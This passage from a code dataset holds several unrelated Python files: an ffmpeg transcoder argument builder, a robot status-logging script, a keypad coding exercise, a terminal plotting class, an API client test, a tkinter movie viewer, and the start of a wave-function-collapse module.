def start(self):\n args = [\n 'ffmpeg',\n # Do not prompt for output files that already exist. Since we created\n # the named pipe in advance, it definitely already exists. A prompt\n # would block ffmpeg to wait for user input.\n '-y',\n ]\n\n if self._config.quiet:\n args += [\n # Suppresses all messages except errors.\n # Without this, a status line will be printed by default showing\n # progress and transcoding speed.\n '-loglevel', 'error',\n ]\n\n if any([output.hardware for output in self._output_videos]):\n args += [\n # Hardware acceleration args.\n '-hwaccel', 'vaapi',\n '-vaapi_device', '/dev/dri/renderD128',\n ]\n\n # TODO(joeyparrish): put input paths into self._input_config.inputs\n for i, input in enumerate(self._input_config.inputs):\n input_path = self._input_paths[i]\n\n if self._config.mode == 'live':\n args += self._live_input(input)\n\n if input.get_start_time():\n args += [\n # Encode from intended starting time of the VOD input.\n '-ss', input.get_start_time(),\n ]\n if input.get_end_time():\n args += [\n # Encode until intended ending time of the VOD input.\n '-to', input.get_end_time(),\n ]\n\n # The input name always comes after the applicable input arguments.\n args += [\n # The input itself.\n '-i', input_path,\n ]\n\n for i, input in enumerate(self._input_config.inputs):\n map_args = [\n # Map corresponding input stream to output file.\n # The format is \":\", so \"i\" here is\n # the input file number, and \"input.get_track()\" is the track number\n # from that input file. The output stream for this input is implied\n # by where we are in the ffmpeg argument list.\n '-map', '{0}:{1}'.format(i, input.get_track()),\n ]\n\n if input.get_media_type() == 'audio':\n for audio in self._output_audios:\n # Map arguments must be repeated for each output file.\n args += map_args\n args += self._encode_audio(audio, input)\n\n if input.get_media_type() == 'video':\n for video in self._output_videos:\n # Map arguments must be repeated for each output file.\n args += map_args\n args += self._encode_video(video, input)\n\n env = {}\n if self._config.debug_logs:\n # Use this environment variable to turn on ffmpeg's logging. This is\n # independent of the -loglevel switch above.\n env['FFREPORT'] = 'file=TranscoderNode.log:level=32'\n\n self._process = self._create_process(args, env)\n\n def _live_input(self, input_object):\n args = []\n if input_object.get_input_type() == 'looped_file':\n pass\n elif input_object.get_input_type() == 'raw_images':\n args += [\n # Parse the input as a stream of images fed into a pipe.\n '-f', 'image2pipe',\n # Set the frame rate to the one specified in the input config.\n # Note that this is the input framerate for the image2 dexuxer, which\n # is not what the similar '-r' option is meant for.\n '-framerate', str(input_object.get_frame_rate()),\n ]\n elif input_object.get_input_type() == 'webcam':\n args += [\n # Format the input using the webcam format.\n '-f', 'video4linux2',\n ]\n args += [\n # A larger queue to buffer input from the pipeline (default is 8).\n # This is in packets, but for raw_images, that means frames. A 720p PPM\n # frame is 2.7MB, and a 1080p PPM is 6.2MB. The entire queue, when\n # full, must fit into memory.\n '-thread_queue_size', '200',\n ]\n return args\n\n def _encode_audio(self, audio, input):\n filters = []\n args = [\n # No video encoding for audio.\n '-vn',\n # Set the number of channels to the one specified in the VOD config\n # file.\n '-ac', str(audio.channels),\n ]\n\n if audio.channels == 6:\n filters += [\n # Work around for https://github.com/google/shaka-packager/issues/598,\n # as seen on https://trac.ffmpeg.org/ticket/6974\n 'channelmap=channel_layout=5.1',\n ]\n\n filters.extend(input.get_filters())\n\n if audio.codec == 'aac':\n args += [\n # Format with MPEG-TS for a pipe.\n '-f', 'mpegts',\n # AAC audio codec.\n '-c:a', 'aac',\n # Set bitrate to the one specified in the VOD config file.\n '-b:a', '{0}'.format(audio.channel_data.aac_bitrate),\n ]\n elif audio.codec == 'opus':\n args += [\n # Opus encoding has output format webm.\n '-f', 'webm',\n # Opus audio codec.\n '-c:a', 'libopus',\n # Set bitrate to the one specified in the VOD config file.\n '-b:a', '{0}'.format(audio.channel_data.opus_bitrate),\n # DASH-compatible output format.\n '-dash', '1',\n ]\n\n if len(filters):\n args += [\n # Set audio filters.\n '-af', ','.join(filters),\n ]\n\n args += [\n # The output.\n audio.pipe,\n ]\n return args\n\n # TODO(joeyparrish): \"video\" is a weak variable name\n def _encode_video(self, video, input):\n filters = []\n args = [\n # No audio encoding for video.\n '-an',\n # Full pelME compare function.\n '-cmp', 'chroma',\n ]\n\n # TODO: auto detection of interlacing\n if input.get_interlaced():\n frame_rate = input.get_frame_rate()\n # Sanity check: since interlaced files are made up of two interlaced\n # frames, the frame rate must be even and not too small.\n assert frame_rate % 2 == 0 and frame_rate >= 48\n filters.append('pp=fd')\n args.extend(['-r', str(frame_rate / 2)])\n\n filters.extend(input.get_filters())\n\n if video.hardware:\n filters.append('format=nv12')\n filters.append('hwupload')\n # -2 here means to choose a width to keep the original aspect ratio.\n filters.append('scale_vaapi=-2:{0}'.format(video.resolution_data.height))\n else:\n # -2 here means to choose a width to keep the original aspect ratio.\n filters.append('scale=-2:{0}'.format(video.resolution_data.height))\n\n if video.codec == 'h264':\n args += [\n # MPEG-TS format works well in a pipe.\n '-f', 'mpegts',\n ]\n\n if self._config.mode == 'live':\n args += [\n # Encodes with highest-speed presets for real-time live streaming.\n '-preset', 'ultrafast',\n ]\n else:\n args += [\n # Take your time for VOD streams.\n '-preset', 'slow',\n # Apply the loop filter for higher quality output.\n '-flags', '+loop',\n ]\n\n if video.hardware:\n args += [\n # H264 VAAPI video codec.\n '-c:v', 'h264_vaapi',\n ]\n else:\n args += [\n # H264 video codec.\n '-c:v', 'h264',\n ]\n\n args += [\n # Set bitrate to the one specified in the VOD config file.\n '-b:v', '{0}'.format(video.resolution_data.h264_bitrate),\n # Set maximum number of B frames between non-B frames.\n '-bf', '0',\n # The only format supported by QT/Apple.\n '-pix_fmt', 'yuv420p',\n # Require a closed GOP. Some decoders don't support open GOPs.\n '-flags', '+cgop',\n ]\n # Use different ffmpeg options depending on the H264 profile.\n args += profile_args[video.resolution_data.h264_profile]\n\n elif video.codec == 'vp9':\n args += [\n # Format using webm.\n '-f', 'webm',\n ]\n\n if video.hardware:\n args += [\n # VP9 VAAPI video codec.\n '-c:v', 'vp9_vaapi',\n ]\n else:\n args += [\n # VP9 video codec.\n '-c:v', 'vp9',\n ]\n\n args += [\n # Set bitrate to the one specified in the VOD config file.\n '-b:v', '{0}'.format(video.resolution_data.vp9_bitrate),\n # DASH-compatible output format.\n '-dash', '1',\n ]\n\n keyframe_interval = int(self._config.packager['segment_size'] *\n input.get_frame_rate())\n args += [\n # Set minimum and maximum GOP length.\n '-keyint_min', str(keyframe_interval), '-g', str(keyframe_interval),\n # Set video filters.\n '-vf', ','.join(filters),\n # The output.\n video.pipe,\n ]\n return args\n","repo_name":"pptphutho/shaka-streamer","sub_path":"streamer/transcoder_node.py","file_name":"transcoder_node.py","file_ext":"py","file_size_in_byte":9379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"30993169377","text":"from urllib import request\nimport json,csv\nimport datetime,time\nimport socket\n\n#获取实时坐标,get请求\nurl1 = \"http://10.7.5.88:8080/gs-robot/real_time_data/position\"\n\n#获取实时线速度\nurl5 = \"http://10.7.5.88:8080/gs-robot/real_time_data/cmd_vel\"\n\n#获取设备状态数据\nurl8 = \"http://10.7.5.88:8080/gs-robot/data/device_status\"\n\nurls =[url1,url5,url8]\ndatas = []\ni = 0\n\nhead = ['No.','日期','时间','坐标X','坐标Y','角度R','线速度','角速度','运动速度','运动停止与否','急停按下与否','充电状态','电池电量','电池电压','主机名称','IP_information']\n\nprint('......\\n')\n\nwhile(True):\n\n try:\n \n timenow_1,timenow_2 = datetime.datetime.now().strftime('%Y-%m-%d'),datetime.datetime.now().strftime('%H:%M:%S')\n \n for url in urls:\n req = request.Request(url)\n res = request.urlopen(req)\n content = json.loads(res.read().decode(encoding='utf-8'))\n datas.append(content)\n\n ip_information = socket.gethostbyname_ex(socket.gethostname())\n data_row = [\n i+1,timenow_1,timenow_2,\n datas[0][\"gridPosition\"][\"x\"],datas[0][\"gridPosition\"][\"y\"],round(float(datas[0][\"angle\"]),2),\n datas[1][\"data\"][\"linear\"][\"x\"],round(float(datas[1][\"data\"][\"angular\"][\"z\"]),4),\n datas[2][\"data\"][\"speed\"],datas[2][\"data\"][\"detailedBrakerDown\"],datas[2][\"data\"][\"emergency\"],datas[2][\"data\"][\"charger\"],datas[2][\"data\"][\"battery\"],datas[2][\"data\"][\"batteryVoltage\"],\n ip_information[0],'|'.join(ip_information[2])\n ]\n with open('motion_and_charger_information_records.csv','a',newline='') as result_csv:\n write_csv = csv.writer(result_csv,dialect='excel')\n if head !=[]:\n write_csv.writerow(head)\n head = []\n write_csv.writerow(data_row)\n except Exception as e:\n \n with open('program_error.txt','a') as result:\n \n result.write(\"\\n******\"+str(timenow_1)+ ' ' + str(timenow_2) + \"******\" + '\\n' + str(e) +'\\n')\n \n i = i +1\n datas =[]\n time.sleep(2)","repo_name":"Hylan129/Self-Learning","sub_path":"gaussian_navigation/motion_monitoring/long-term motion monitioring.py","file_name":"long-term motion monitioring.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73513636587","text":"def my_solution(numbers, hand):\n answer = ''\n left = {1, 4, 7}\n right = {3, 6, 9}\n present_left, present_right = 0, 0\n for i in numbers:\n print(present_left, present_right, answer)\n if i in left:\n answer += 'L'\n present_left = i\n elif i in right:\n answer += 'R'\n present_right = i\n else:\n if i - present_left < i - present_right - 2:\n answer += 'L'\n present_left = i\n elif i - present_right - 2 < i - present_left:\n answer += 'R'\n present_right = i\n else:\n if hand == \"left\":\n answer += 'L'\n present_left = i\n else:\n answer += 'R'\n present_right = i\n\n print(answer)\n return answer\n\n\ndef findDistance(currentN, nextN):\n keypad = {1: [0, 0], 2: [1, 0], 3: [2, 0],\n 4: [0, 1], 5: [1, 1], 6: [2, 1],\n 7: [0, 2], 8: [1, 2], 9: [2, 2],\n \"*\": [0, 3], 0: [1, 3], \"#\": [2, 3]}\n x1, y1 = keypad[currentN]\n x2, y2 = keypad[nextN]\n return abs(x1 - x2) + abs(y1 - y2)\n\n\ndef solution(numbers, hand):\n answer = ''\n current_l, current_r = '*', '#'\n\n for i in numbers:\n if i in (1, 4, 7):\n answer += 'L'\n current_l = i\n elif i in (3, 6, 9):\n answer += 'R'\n current_r = i\n else:\n if findDistance(current_l, i) < findDistance(current_r, i):\n answer += 'L'\n current_l = i\n elif findDistance(current_r, i) < findDistance(current_l, i):\n answer += 'R'\n current_r = i\n else:\n if hand == 'left':\n answer += 'L'\n current_l = i\n else:\n answer += 'R'\n current_r = i\n\n return answer\n","repo_name":"JUNYEONG-K/algorithm","sub_path":"programmers/키 패드 누르기.py","file_name":"키 패드 누르기.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4445691351","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n# The MIT License\n\n# Copyright (c) 2017 - 2018 Tammo Ippen, tammo.ippen@posteo.de\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom collections import namedtuple\nfrom datetime import timedelta\nfrom itertools import cycle\nimport os\nimport re\n\nfrom six.moves import zip\n\nfrom ._canvas import Canvas\nfrom ._colors import color\nfrom ._input_formatter import InputFormatter\nfrom ._util import hist, mk_timedelta, timestamp\n\n# TODO documentation!!!\n# TODO tests\n\n\nclass Figure(object):\n \"\"\"Figure class to compose multiple plots.\n\n Within a Figure you can easily compose many plots, assign labels to plots\n and define the properties of the underlying Canvas. Possible properties that\n can be defined are:\n\n width, height: int Define the number of characters in X / Y direction\n which are used for plotting.\n x_limits: float Define the X limits of the reference coordinate system,\n that will be plottered.\n y_limits: float Define the Y limits of the reference coordinate system,\n that will be plottered.\n color_mode: str Define the used color mode. See `plotille.color()`.\n with_colors: bool Define, whether to use colors at all.\n background: multiple Define the background color.\n x_label, y_label: str Define the X / Y axis label.\n \"\"\"\n _COLOR_SEQ = [\n {'names': 'white', 'rgb': (255, 255, 255), 'byte': 0X7},\n {'names': 'red', 'rgb': (255, 0, 0), 'byte': 0x1},\n {'names': 'green', 'rgb': (0, 255, 0), 'byte': 0x2},\n {'names': 'yellow', 'rgb': (255, 255, 0), 'byte': 0x3},\n {'names': 'blue', 'rgb': (0, 0, 255), 'byte': 0x4},\n {'names': 'magenta', 'rgb': (255, 0, 255), 'byte': 0x5},\n {'names': 'cyan', 'rgb': (0, 255, 255), 'byte': 0x6},\n ]\n\n def __init__(self):\n self._color_seq = iter(cycle(Figure._COLOR_SEQ))\n self._width = None\n self._height = None\n self._x_min = None\n self._x_max = None\n self._y_min = None\n self._y_max = None\n self._color_mode = None\n self._with_colors = True\n self._origin = True\n self.linesep = os.linesep\n self.background = None\n self.x_label = 'X'\n self.y_label = 'Y'\n self._plots = []\n self._in_fmt = InputFormatter()\n\n self._y_axis_right_align = False\n\n @property\n def width(self):\n if self._width is not None:\n return self._width\n return 80\n\n @width.setter\n def width(self, value):\n if not (isinstance(value, int) and value > 0):\n raise ValueError('Invalid width: {}'.format(value))\n self._width = value\n\n @property\n def height(self):\n if self._height is not None:\n return self._height\n return 40\n\n @height.setter\n def height(self, value):\n if not (isinstance(value, int) and value > 0):\n raise ValueError('Invalid height: {}'.format(value))\n self._height = value\n\n @property\n def color_mode(self):\n if self._color_mode is not None:\n return self._color_mode\n return 'names'\n\n @color_mode.setter\n def color_mode(self, value):\n if value not in ('names', 'byte', 'rgb'):\n raise ValueError('Only supports: names, byte, rgb!')\n if self._plots != []:\n raise RuntimeError('Change color mode only, when no plots are prepared.')\n self._color_mode = value\n\n @property\n def with_colors(self):\n return self._with_colors\n\n @with_colors.setter\n def with_colors(self, value):\n if not isinstance(value, bool):\n raise ValueError('Only bool allowed: \"{}\"'.format(value))\n self._with_colors = value\n\n @property\n def origin(self):\n return self._origin\n\n @origin.setter\n def origin(self, value):\n if not isinstance(value, bool):\n raise ValueError('Invalid origin: {}'.format(value))\n self._origin = value\n\n def register_label_formatter(self, type_, formatter):\n self._in_fmt.register_formatter(type_, formatter)\n\n def register_float_converter(self, type_, converter):\n self._in_fmt.register_converter(type_, converter)\n\n def x_limits(self):\n return self._limits(self._x_min, self._x_max, False)\n\n def set_x_limits(self, min_=None, max_=None):\n self._x_min, self._x_max = self._set_limits(self._x_min, self._x_max, min_, max_)\n\n def y_limits(self):\n return self._limits(self._y_min, self._y_max, True)\n\n def set_y_limits(self, min_=None, max_=None):\n self._y_min, self._y_max = self._set_limits(self._y_min, self._y_max, min_, max_)\n\n def _set_limits(self, init_min, init_max, min_=None, max_=None):\n if min_ is not None and max_ is not None:\n if min_ >= max_:\n raise ValueError('min_ is larger or equal than max_.')\n init_min = min_\n init_max = max_\n elif min_ is not None:\n if init_max is not None and min_ >= init_max:\n raise ValueError('Previous max is smaller or equal to new min_.')\n init_min = min_\n elif max_ is not None:\n if init_min is not None and init_min >= max_:\n raise ValueError('Previous min is larger or equal to new max_.')\n init_max = max_\n else:\n init_min = None\n init_max = None\n\n return init_min, init_max\n\n def _limits(self, low_set, high_set, is_height):\n if low_set is not None and high_set is not None:\n return low_set, high_set\n\n low, high = None, None\n for p in self._plots:\n if is_height:\n _min, _max = _limit(p.height_vals())\n else:\n _min, _max = _limit(p.width_vals())\n if low is None:\n low = _min\n high = _max\n\n low = min(_min, low)\n high = max(_max, high)\n\n return _choose(low, high, low_set, high_set)\n\n def _y_axis(self, ymin, ymax, label='Y'):\n delta = abs(ymax - ymin)\n if isinstance(delta, timedelta):\n y_delta = mk_timedelta(timestamp(delta) / self.height)\n else:\n y_delta = delta / self.height\n\n res = [self._in_fmt.fmt(i * y_delta + ymin, abs(ymax - ymin), chars=10) + ' | '\n for i in range(self.height)]\n if self._y_axis_right_align:\n tmp_res = []\n for y_val in res:\n pattern = r'\\d.\\d+'\n match = re.match(pattern, y_val)\n if match is not None:\n new_y_val = '{val:.1f}'.format(val=float(match[0])).rjust(10, ' ')\n new_y_val = '{} | '.format(new_y_val)\n tmp_res.append(new_y_val)\n else:\n tmp_res.append(y_val)\n res = tmp_res\n\n # add max separately\n res += [self._in_fmt.fmt(self.height * y_delta + ymin, abs(ymax - ymin), chars=10) + ' |']\n\n # modify max by specific format\n if self._y_axis_right_align:\n pattern = r'\\d.\\d+'\n match = re.match(pattern, res[-1])\n if match is not None:\n new_y_val = '{val:.1f}'.format(val=float(match[0])).rjust(10, ' ')\n new_y_val = '{} | '.format(new_y_val)\n res[-1] = new_y_val\n\n ylbl = '[{}]'.format(label)\n ylbl_left = (10 - len(ylbl)) // 2\n ylbl_right = ylbl_left + len(ylbl) % 2\n\n res += [' ' * (ylbl_left) + ylbl + ' ' * (ylbl_right) + ' ^']\n return list(reversed(res))\n\n def _x_axis(self, xmin, xmax, label='X', with_y_axis=False):\n delta = abs(xmax - xmin)\n if isinstance(delta, timedelta):\n x_delta = mk_timedelta(timestamp(delta) / self.width)\n else:\n x_delta = delta / self.width\n starts = ['', '']\n if with_y_axis:\n starts = ['-' * 11 + '|-', ' ' * 11 + '| ']\n res = []\n\n # res += [starts[0] + '|---------' * (self.width // 10) + '|-> [' + label + ']']\n # res += [starts[1] + ' '.join(self._in_fmt.fmt(i * 10 * x_delta + xmin, delta, left=True, chars=9)\n # for i in range(self.width // 10 + 1))]\n res += [starts[0] + '|---------' * (self.width // 10) + '|' + '-' * (self.width % 10-2) + '|-> [' + label + ']']\n\n \"\"\" print last value on x-axis \"\"\"\n _x_axis_info = starts[1] + ' '.join(self._in_fmt.fmt(\\\n i * 10 * x_delta + xmin, delta, left=True, chars=9)\n for i in range(self.width // 10 + 1))\n _x_axis_info = '{base}{space}{suffix}'.format(base=_x_axis_info.rstrip(),\\\n space=' '*(self.width%10-len(str(self.width))-1), suffix=self.width-1)\n res += [_x_axis_info]\n return res\n\n def clear(self):\n self._plots = []\n\n def plot(self, X, Y, lc=None, interp='linear', label=None): # noqa: N803\n if len(X) > 0:\n if lc is None:\n lc = next(self._color_seq)[self.color_mode]\n self._plots += [Plot.create(X, Y, lc, interp, label)]\n\n def scatter(self, X, Y, lc=None, label=None): # noqa: N803\n if len(X) > 0:\n if lc is None:\n lc = next(self._color_seq)[self.color_mode]\n self._plots += [Plot.create(X, Y, lc, None, label)]\n\n def histogram(self, X, bins=160, lc=None): # noqa: N803\n if len(X) > 0:\n if lc is None:\n lc = next(self._color_seq)[self.color_mode]\n self._plots += [Histogram.create(X, bins, lc)]\n\n def show(self, legend=False):\n xmin, xmax = self.x_limits()\n ymin, ymax = self.y_limits()\n if all(isinstance(p, Histogram) for p in self._plots):\n ymin = 0\n # create canvas\n canvas = Canvas(self.width, self.height,\n self._in_fmt.convert(xmin), self._in_fmt.convert(ymin),\n self._in_fmt.convert(xmax), self._in_fmt.convert(ymax),\n self.background, self.color_mode)\n\n plot_origin = False\n for p in self._plots:\n p.write(canvas, self.with_colors, self._in_fmt)\n if isinstance(p, Plot):\n plot_origin = True\n\n if self.origin and plot_origin:\n # print X / Y origin axis\n canvas.line(self._in_fmt.convert(xmin), 0, self._in_fmt.convert(xmax), 0)\n canvas.line(0, self._in_fmt.convert(ymin), 0, self._in_fmt.convert(ymax))\n\n res = canvas.plot(linesep=self.linesep)\n\n # add y axis\n yaxis = self._y_axis(ymin, ymax, label=self.y_label)\n res = (\n yaxis[0] + self.linesep + # up arrow\n yaxis[1] + self.linesep + # maximum\n self.linesep.join(lbl + line for lbl, line in zip(yaxis[2:], res.split(self.linesep)))\n )\n\n # add x axis\n xaxis = self._x_axis(xmin, xmax, label=self.x_label, with_y_axis=True)\n res = (\n res + self.linesep + # plot\n self.linesep.join(xaxis)\n )\n\n if legend:\n res += '\\n\\nLegend:\\n-------\\n'\n res += '\\n'.join([\n color('тадтад {}'.format(p.label if p.label is not None else 'Label {}'.format(i)),\n fg=p.lc, mode=self.color_mode, no_color=not self.with_colors)\n for i, p in enumerate(self._plots)\n if isinstance(p, Plot)\n ])\n\n return res\n\n\nclass Plot(namedtuple('Plot', ['X', 'Y', 'lc', 'interp', 'label'])):\n\n @classmethod\n def create(cls, X, Y, lc, interp, label): # noqa: N803\n if len(X) != len(Y):\n raise ValueError('X and Y dim have to be the same.')\n if interp not in ('linear', None):\n raise ValueError('Only \"linear\" and None are allowed values for `interp`.')\n\n return cls(X, Y, lc, interp, label)\n\n def width_vals(self):\n return self.X\n\n def height_vals(self):\n return self.Y\n\n def write(self, canvas, with_colors, in_fmt):\n # make point iterators\n from_points = zip(map(in_fmt.convert, self.X), map(in_fmt.convert, self.Y))\n to_points = zip(map(in_fmt.convert, self.X), map(in_fmt.convert, self.Y))\n\n # remove first point of to_points\n next(to_points)\n\n color = self.lc if with_colors else None\n # plot points\n for (x0, y0), (x, y) in zip(from_points, to_points):\n canvas.point(x0, y0, color=color)\n\n canvas.point(x, y, color=color)\n if self.interp == 'linear':\n canvas.line(x0, y0, x, y, color=color)\n\n\nclass Histogram(namedtuple('Histogram', ['X', 'bins', 'frequencies', 'buckets', 'lc'])):\n @classmethod\n def create(cls, X, bins, lc): # noqa: N803\n frequencies, buckets = hist(X, bins)\n\n return cls(X, bins, frequencies, buckets, lc)\n\n def width_vals(self):\n return self.X\n\n def height_vals(self):\n return self.frequencies\n\n def write(self, canvas, with_colors, in_fmt):\n # how fat will one bar of the histogram be\n x_diff = (canvas.dots_between(in_fmt.convert(self.buckets[0]), 0,\n in_fmt.convert(self.buckets[1]), 0)[0] or 1)\n bin_size = (in_fmt.convert(self.buckets[1]) - in_fmt.convert(self.buckets[0])) / x_diff\n\n color = self.lc if with_colors else None\n for i in range(self.bins):\n # for each bucket\n if self.frequencies[i] > 0:\n for j in range(x_diff):\n # print bar\n x_ = in_fmt.convert(self.buckets[i]) + j * bin_size\n\n if canvas.xmin <= x_ <= canvas.xmax:\n canvas.line(x_, 0,\n x_, self.frequencies[i],\n color=color)\n\n\ndef _limit(values):\n _min = 0\n _max = 1\n if len(values) > 0:\n _min = min(values)\n _max = max(values)\n\n return (_min, _max)\n\n\ndef _diff(low, high):\n if low == high:\n if low == 0:\n return 0.5\n else:\n return abs(low * 0.1)\n else:\n delta = abs(high - low)\n if isinstance(delta, timedelta):\n return mk_timedelta(timestamp(delta) * 0.1)\n else:\n return delta * 0.1\n\n\ndef _default(low_set, high_set):\n if low_set is None and high_set is None:\n return 0.0, 1.0 # defaults\n\n if low_set is None and high_set is not None:\n if high_set <= 0:\n return high_set - 1, high_set\n else:\n return 0.0, high_set\n\n if low_set is not None and high_set is None:\n if low_set >= 1:\n return low_set, low_set + 1\n else:\n return low_set, 1.0\n\n # Should never get here! => checked in function before\n\n\ndef _choose(low, high, low_set, high_set):\n no_data = low is None and high is None\n if no_data:\n return _default(low_set, high_set)\n\n else: # some data\n if low_set is None and high_set is None:\n # no restrictions from user, use low & high\n diff = _diff(low, high)\n return low - diff, high + diff\n\n if low_set is None and high_set is not None:\n # user sets high end\n if high_set < low:\n # high is smaller than lowest value\n return high_set - 1, high_set\n\n diff = _diff(low, high_set)\n return low - diff, high_set\n\n if low_set is not None and high_set is None:\n # user sets low end\n if low_set > high:\n # low is larger than highest value\n return low_set, low_set + 1\n\n diff = _diff(low_set, high)\n return low_set, high + diff\n\n # Should never get here! => checked in function before\n","repo_name":"louisYen/S3R","sub_path":"anomaly/utilities/plotille/plotille/_figure.py","file_name":"_figure.py","file_ext":"py","file_size_in_byte":17071,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"37"} +{"seq_id":"16345132312","text":"import os\nfrom .core_function import client_search_testing\n\nimport pytest\nfrom emmet.core.molecules.summary import HasProps\n\nfrom mp_api.client.routes.molecules.summary import MoleculesSummaryRester\n\nexcluded_params = [\n \"sort_fields\",\n \"chunk_size\",\n \"num_chunks\",\n \"all_fields\",\n \"fields\",\n \"exclude_elements\",\n \"has_props\"\n]\n\nalt_name_dict = {\"formula\": \"formula_alphabetical\", \"molecule_ids\": \"molecule_id\"}\n\ncustom_field_tests = {\n \"molecule_ids\": [\"351ef090ebd90b661a4e1205756f6957-C1Mg1N2O1S1-m2-1\"],\n \"formula\": \"C2 H4\",\n \"chemsys\": \"C-H\",\n \"elements\": [\"P\"],\n \"has_solvent\": \"DIELECTRIC=18,500;N=1,415;ALPHA=0,000;BETA=0,735;GAMMA=20,200;PHI=0,000;PSI=0,000\",\n \"has_level_of_theory\": \"wB97X-V/def2-TZVPPD/SMD\",\n \"has_lot_solvent\": \"wB97X-V/def2-TZVPPD/SMD(SOLVENT=THF)\",\n \"nelements\": 2,\n \"charge\": 1,\n \"spin_multiplicity\": 1,\n \"has_props\": [HasProps.orbitals],\n} # type: dict\n\n@pytest.mark.skip(reason=\"Temporary until data adjustments\")\n@pytest.mark.skipif(\n os.environ.get(\"MP_API_KEY\", None) is None, reason=\"No API key found.\"\n)\ndef test_client():\n search_method = MoleculesSummaryRester().search\n\n client_search_testing(\n search_method=search_method,\n excluded_params=excluded_params,\n alt_name_dict=alt_name_dict,\n custom_field_tests=custom_field_tests,\n sub_doc_fields=[],\n )\n","repo_name":"materialsproject/api","sub_path":"tests/molecules/test_summary.py","file_name":"test_summary.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"37"} +{"seq_id":"20654673705","text":"from tkinter import *\nfrom tkinter import ttk\nimport requests\ndef getInfo():\n root.geometry(\"410x450\")\n user_select_title=combo_title.get()\n result={}\n\n for i in apiresponse[\"data\"]:\n if i[\"title\"] == user_select_title:\n result=i\n print(result)\n print(result[\"title\"])\n\n lbl_result=Label(root,text=f\"year:{result['year']} / genres:{result['genres']}\",bg=\"#E7D4B5\")\n lbl_result.grid(columnspan=2,pady=10)\n\nresponse = requests.get(\"http://moviesapi.ir/api/v1/movies\")\napiresponse=response.json()\ntitleList=[]\nmovieInfo=apiresponse[\"data\"]\n\nroot=Tk()\nroot.config(bg=\"#E7D4B5\")\nroot.geometry(\"410x150+1+1\")\nroot.title(\"API\")\nlbl_title=Label(root,text=\"title\",font=('Times',24),bg=\"#E7D4B5\")\n\nfor i in range(len(movieInfo)):\n dic=movieInfo[i]\n if dic[\"title\"] in titleList:\n pass\n else:\n titleList.append(dic[\"title\"])\ncombo_title=ttk.Combobox(root,values=titleList,font=('Times',20))\nprint(f\"title:{titleList}\")\nbtn=Button(root,text=\"Enter\",bg=\"#A0937D\",width=9,height=3,command=getInfo)\n\n\n\n#grid\nlbl_title.grid(row=0,column=0,pady=10,padx=10)\ncombo_title.grid(row=0,column=1)\nbtn.grid(row=1,column=1,pady=15)\nroot.mainloop()","repo_name":"soheila76/Term-3","sub_path":"APIFilm/withTitleT3.py","file_name":"withTitleT3.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27043827206","text":"from __future__ import annotations\n\nfrom random import choice\nfrom .wfc_abstract import WFCAbstract\nfrom .board import Board2d, BoardTile\nfrom .superposition_tile import SuperpositionTile\n\n_TileSideFormat = int\n\n_TileRulesFormat = tuple[\n _TileSideFormat, # left\n _TileSideFormat, # top\n _TileSideFormat, # right\n _TileSideFormat, # bottom\n]\n\n\nclass TileRules:\n def __init__(self, rules: tuple[int, int, int, int]):\n self.rules = rules\n\n def __str__(self):\n return str(self.rules)\n\n def __repr__(self):\n return str(self)\n\n def __getitem__(self, item):\n return self.rules[item]\n\n def compare(self, collapse_rules: CollapseRules, tile_type: int, side: int) -> bool:\n return collapse_rules.rules[tile_type][side] == self[(side - 2) % 4]\n\n\nclass CollapseRules:\n def __init__(self, rules: dict[int, TileRules], chance: dict[int, int] | None = None):\n self.rules = rules\n self.chance = chance\n\n @classmethod\n def parse(cls, rules: dict[int, _TileRulesFormat], chance: dict[int: int] | None = None):\n rules_dict = {r: TileRules(rules[r]) for r in rules}\n return cls(rules_dict, chance)\n\n def collapse(self, superpositions: set[int], orientation: int, tile_type: set[int]):\n if not len(tile_type):\n return superpositions\n\n valid: set[int] = set()\n\n for superposition in superpositions:\n for tile in tile_type:\n if self.rules[superposition].compare(self, tile, orientation):\n valid.add(superposition)\n return valid\n\n def collapse_around(self, tile: BoardTile[SuperpositionTile]) -> set[int]:\n ret = tile.tile.superpositions\n\n if tile.tile.collapsed:\n return ret\n\n if tile.left:\n ret = self.collapse(ret, 0, tile.left.tile.superpositions)\n if tile.right:\n ret = self.collapse(ret, 2, tile.right.tile.superpositions)\n if tile.up:\n ret = self.collapse(ret, 1, tile.up.tile.superpositions)\n if tile.down:\n ret = self.collapse(ret, 3, tile.down.tile.superpositions)\n\n return ret\n\n def get_options(self, superpositions: set[int], orientation: int, tile_type: set[int]) -> list[int]:\n valid = self.collapse(superpositions, orientation, tile_type)\n\n ret = []\n\n for superposition in valid:\n if self.chance is None or superposition not in self.chance:\n ret.append(superposition)\n else:\n ret += [superposition] * self.chance[superposition]\n return ret\n\n\nclass Collapse(WFCAbstract):\n def __init__(self, board: 